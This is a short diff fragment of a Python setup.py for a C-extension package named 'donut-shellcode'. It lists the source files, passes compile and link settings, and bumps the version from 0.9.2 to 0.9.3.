12 'hash.c',
13 'encrypt.c',
14 'payload/clib.c',
15 'donutmodule.c'
16 ]
34 include_dirs = include_dirs,
35 sources = sources,
36 libraries = libraries,
37 library_dirs = library_dirs,
38 extra_compile_args = extra_compile_args,
39 extra_link_args = extra_link_args,
40 extra_objects = extra_objects,
1741 )
1842
1943 setup(
2044 name='donut-shellcode',
21 version='0.9.2',
45 version='0.9.3',
2246 description='Donut Python C extension',
2347 long_description=long_description,
2448 long_description_content_type="text/markdown",